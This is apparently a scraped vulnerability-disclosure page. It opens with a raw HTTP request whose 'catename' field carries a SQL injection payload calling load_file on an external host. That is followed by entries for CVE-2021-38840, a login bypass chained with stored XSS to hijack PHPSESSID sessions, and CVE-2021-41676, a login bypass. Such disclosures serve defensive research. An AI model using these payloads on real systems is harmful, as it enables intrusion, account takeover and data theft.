Referer: http://192.168.1.2/Vehicle%20parking%20management%20System%20project/vpms/add-category.php
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH7En2PBJTRM5v1Yq
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 241

------WebKitFormBoundaryH7En2PBJTRM5v1Yq
Content-Disposition: form-data; name="catename"

277509'+(select load_file('\\\\ma0xscj8wyb2gd8sai9pcyvl7cd51xvlmoagx6lv.nu11secur1ty.net\\hgt'))+'
------WebKitFormBoundaryH7En2PBJTRM5v1Yq
Content-Disposition: form-data; name="submit"

..e
------WebKitFormBoundaryH7En2PBJTRM5v1Yq--

MySQL Response

HTTP/1.1 200 OK
Date: Sat, 30 Oct 2021 20:06:14 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9928

<!doctype html>
<html class="no-js" lang="">
<head>

<title>VPMS - Add Category</title>


<link rel="apple-touch-icon" href="https://i.imgur.com/QRAUqs9.png">
<link rel="sho
...[SNIP]...

Reproduce:

href

Proof:

href

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

CVE-2021-38840

Vendor

Software

Description:

The Water Refilling System – PHP (by: oretnom23 ) v1.0 is vulnerable to remote SQL-Injection-Bypass-Authentication + XSS-Stored Hijacking PHPSESSID

  • m0re info: https://portswigger.net/support/using-sql-injection-to-bypass-authentication.
    The parameter (username) from the login form is not protected correctly, and there is no security or escaping against malicious payloads.
    When the user sends a malicious query or malicious payload to the MySQL server, he can bypass the login credentials and take control of the administrator account.
  1. XSS – Stored PHPSESSID Vulnerable
  • The vulnerable XSS app is "maintenance", parameter "name". After the successful SQL injection, the malicious user can store an XSS payload with which he can take the
    active PHPSESSID session.
  2. Remote PHPSESSID – Injection
  • After the successful XSS attack, the malicious user can take control of the administrative account of the system from everywhere
    by using the PHPSESSID, and then he can make a lot of bad things!

CONCLUSION: This vendor must STOP creating all these broken projects and vulnerable software programs, probably he is not a developer!

BR

  • [+] @nu11secur1ty System Administrator – Infrastructure and Penetration Testing Engineer

Reproduce:

href

Proof:

href

BR nu11secur1ty

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

CVE-2021-41676

Vendor

Software

Description:

The Pharmacy Point of Sale System 1.0 is vulnerable to SQL Injection Bypass Authentication for the admin account.
The malicious user can use a malicious SQL query to login into the system as an administrator and can corrupt and use the sensitive information from this system.

Proof:

href

Also see this collection:

https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23